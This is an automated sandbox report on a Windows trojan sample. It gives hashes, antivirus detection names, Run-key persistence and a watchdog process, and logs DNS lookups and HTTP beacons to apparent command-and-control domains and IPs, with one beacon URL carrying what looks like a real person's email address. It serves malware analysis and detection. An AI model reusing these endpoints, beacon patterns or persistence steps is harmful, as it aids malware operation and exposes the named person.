Analysis Date2015-07-25 08:48:21
MD50f59988b7bec8514930a4acd531d9934
SHA169033f40e9927db251091117a607279fc3139e2d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3b36720d5742f1e38b7ee12fde4ff5ad sha1: 1f3dd4f1fe74576c26fb1791f1b10acf232092df size: 296448
Section.rdata md5: 2f2eaf4fa38d78c18d942d5e45d6e95e sha1: 528d377da469172aaf9d4a2f5422e66f5b691228 size: 32768
Section.data md5: 62c0b18e9101544f077c563d03806a82 sha1: 325763828182df647e38890ab1f2b7f2c8088239 size: 98304
Timestamp2014-10-30 10:26:02
PackerMicrosoft Visual C++ ?.?
PEhash709d5b2a4a0a30329b46e5ea2216ca5b8b4205bd
IMPhash57ea14fdab2d286a6a8d3b04b097a2cc
AVRisingno_virus
AVMcafeeTrojan-FEMT!0F59988B7BEC
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7no_virus
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. Webno_virus
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HomeGroup Session Telephony Auto Shadow ➝
C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\cdetebmyipb.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.nvntb
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gsjsvjttvnqxoct\twcamwkru.exe"

Network Details:

DNScrowdcatch.net
Type: A
50.63.202.47
DNSsummerdress.net
Type: A
50.87.150.116
DNSpartydress.net
Type: A
208.73.211.179
DNSpartydress.net
Type: A
208.73.211.195
DNSpartydress.net
Type: A
208.73.211.192
DNSpartydress.net
Type: A
208.73.211.183
DNSlaughnotice.net
Type: A
95.211.230.75
DNSgentlemaneearly.net
Type: A
DNSalreadyeearly.net
Type: A
DNSgentlemanpublic.net
Type: A
DNSalreadypublic.net
Type: A
DNSgentlemandress.net
Type: A
DNSalreadydress.net
Type: A
DNSfollowcatch.net
Type: A
DNSmembercatch.net
Type: A
DNSfolloweearly.net
Type: A
DNSmembereearly.net
Type: A
DNSfollowpublic.net
Type: A
DNSmemberpublic.net
Type: A
DNSfollowdress.net
Type: A
DNSmemberdress.net
Type: A
DNSbegincatch.net
Type: A
DNSknowncatch.net
Type: A
DNSbegineearly.net
Type: A
DNSknowneearly.net
Type: A
DNSbeginpublic.net
Type: A
DNSknownpublic.net
Type: A
DNSbegindress.net
Type: A
DNSknowndress.net
Type: A
DNSsummercatch.net
Type: A
DNSsummereearly.net
Type: A
DNScrowdeearly.net
Type: A
DNSsummerpublic.net
Type: A
DNScrowdpublic.net
Type: A
DNScrowddress.net
Type: A
DNSthoughtcatch.net
Type: A
DNSwatercatch.net
Type: A
DNSthoughteearly.net
Type: A
DNSwatereearly.net
Type: A
DNSthoughtpublic.net
Type: A
DNSwaterpublic.net
Type: A
DNSthoughtdress.net
Type: A
DNSwaterdress.net
Type: A
DNSwomancatch.net
Type: A
DNSsmokecatch.net
Type: A
DNSwomaneearly.net
Type: A
DNSsmokeeearly.net
Type: A
DNSwomanpublic.net
Type: A
DNSsmokepublic.net
Type: A
DNSwomandress.net
Type: A
DNSsmokedress.net
Type: A
DNSpartycatch.net
Type: A
DNSfightcatch.net
Type: A
DNSpartyeearly.net
Type: A
DNSfighteearly.net
Type: A
DNSpartypublic.net
Type: A
DNSfightpublic.net
Type: A
DNSfightdress.net
Type: A
DNSseveralength.net
Type: A
DNSlaughlength.net
Type: A
DNSseveranotice.net
Type: A
DNSseveraindeed.net
Type: A
DNSlaughindeed.net
Type: A
DNSseveraduring.net
Type: A
DNSlaughduring.net
Type: A
DNSsimplelength.net
Type: A
DNSmotherlength.net
Type: A
DNSsimplenotice.net
Type: A
DNSmothernotice.net
Type: A
DNSsimpleindeed.net
Type: A
DNSmotherindeed.net
Type: A
DNSsimpleduring.net
Type: A
DNSmotherduring.net
Type: A
DNSmountainlength.net
Type: A
DNSpossiblelength.net
Type: A
DNSmountainnotice.net
Type: A
DNSpossiblenotice.net
Type: A
DNSmountainindeed.net
Type: A
DNSpossibleindeed.net
Type: A
DNSmountainduring.net
Type: A
DNSpossibleduring.net
Type: A
DNSperhapslength.net
Type: A
DNSwindowlength.net
Type: A
DNSperhapsnotice.net
Type: A
DNSwindownotice.net
Type: A
DNSperhapsindeed.net
Type: A
DNSwindowindeed.net
Type: A
DNSperhapsduring.net
Type: A
HTTP GEThttp://crowdcatch.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent:
HTTP GEThttp://summerdress.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent:
HTTP GEThttp://partydress.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent:
HTTP GEThttp://laughnotice.net/index.php?email=katharina.mosseng@lofotenseafood.no&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 50.63.202.47:80
Flows TCP192.168.1.1:1032 ➝ 50.87.150.116:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.179:80
Flows TCP192.168.1.1:1034 ➝ 95.211.230.75:80

Raw Pcap

Strings